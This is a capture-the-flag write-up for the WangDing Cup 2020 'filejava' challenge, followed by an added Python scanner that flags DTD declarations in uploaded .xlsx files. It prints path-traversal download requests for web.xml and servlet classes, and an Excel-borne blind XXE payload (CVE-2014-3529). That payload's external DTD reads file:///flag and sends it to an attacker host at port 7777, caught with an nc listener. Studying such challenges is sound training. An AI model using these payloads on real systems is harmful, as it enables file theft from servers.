[WangDing Cup 2020 Qinglong Group]

Sk1y 2022-01-26 12:22:55 Reads: 353

[WangDing Cup 2020 Qinglong Group] filejava


Knowledge points: web.xml file leakage, blind XXE

Solution

Open the challenge container; it asks us to upload a file.


First upload a file, then capture the request when downloading it.


This reveals the download path, so we can try to read web.xml:

/DownloadServlet?filename=../../../web.xml

or

/DownloadServlet?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/web.xml


Then download the servlet classes the same way:

DownloadServlet?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/cn/abc/servlet/DownloadServlet.class
DownloadServlet?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/cn/abc/servlet/ListFileServlet.class
DownloadServlet?filename=../../../../../../../../../usr/local/tomcat/webapps/ROOT/WEB-INF/classes/cn/abc/servlet/UploadServlet.class

Then decompile them with JD-GUI (download: Free Download JD-GUI for Windows Latest Version (apponic.com)).


The key point in the decompiled code: Excel parsing combined with XXE, CVE-2014-3529.

Create a new file named excel-sk1y.xlsx and unzip it.


Then edit [Content_Types].xml and add the following on its second line:

<!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://vps/file.dtd"> %remote;%int;%send; ]>

Then zip it back up as excel-sk1y.xlsx.

Here vps is the IP of your own public server. The result looks like this:


In the web root on the vps (usually /var/www/html/), add a file.dtd file with the following content:

<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://vps:7777?p=%file;'>">

Listen on port 7777 on the vps:

nc -lvp 7777

Then upload excel-sk1y.xlsx and receive the flag.

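As an added defensive check (not part of this writeup or the challenge code): an upload-side scan that flags the DOCTYPE/ENTITY declaration the payload above depends on, in any XML part of an .xlsx, before the workbook reaches the Excel parser. The .xlsx-like zips and the vps.invalid hostname are constructed for the demo.

```python
import io
import re
import zipfile

# A DTD (DOCTYPE or ENTITY declaration) never belongs in an OOXML part; its
# presence is the signature of the [Content_Types].xml trick used above.
DTD_RE = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)
XML_PART_RE = re.compile(r"\.(?:xml|rels)$", re.IGNORECASE)
MAX_PART_BYTES = 8 * 1024 * 1024  # reject inflated parts instead of scanning them


def find_dtd_parts(xlsx_bytes):
    """Scan every XML part of an OOXML zip and return [(part_name, reason)].
    An empty list means the workbook may be handed to the XML parser."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        for info in zf.infolist():
            if not XML_PART_RE.search(info.filename):
                continue
            with zf.open(info) as part:
                data = part.read(MAX_PART_BYTES + 1)
            if len(data) > MAX_PART_BYTES:
                findings.append((info.filename, "oversized"))
            elif DTD_RE.search(data):
                findings.append((info.filename, "dtd"))
    return findings


def build_workbook(content_types_xml):
    """Constructed minimal .xlsx-like zip (not a real workbook) for the demo."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types_xml)
        zf.writestr("xl/workbook.xml", '<?xml version="1.0"?><workbook/>')
    return buf.getvalue()


CLEAN_TYPES = '<?xml version="1.0" encoding="UTF-8"?>\n<Types/>'
# Same part with an external-DTD DOCTYPE inserted on line 2, as in the writeup;
# the hostname is a constructed placeholder.
POISONED_TYPES = CLEAN_TYPES.replace(
    "\n", '\n<!DOCTYPE x [<!ENTITY % remote SYSTEM "http://vps.invalid/file.dtd"> %remote;]>\n', 1
)

if __name__ == "__main__":
    for label, xml in (("clean", CLEAN_TYPES), ("poisoned", POISONED_TYPES)):
        print(label, find_dtd_parts(build_workbook(xml)))
```

The scan complements, but does not replace, parsing with DTD processing disabled (or a parser version that fixes CVE-2014-3529).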
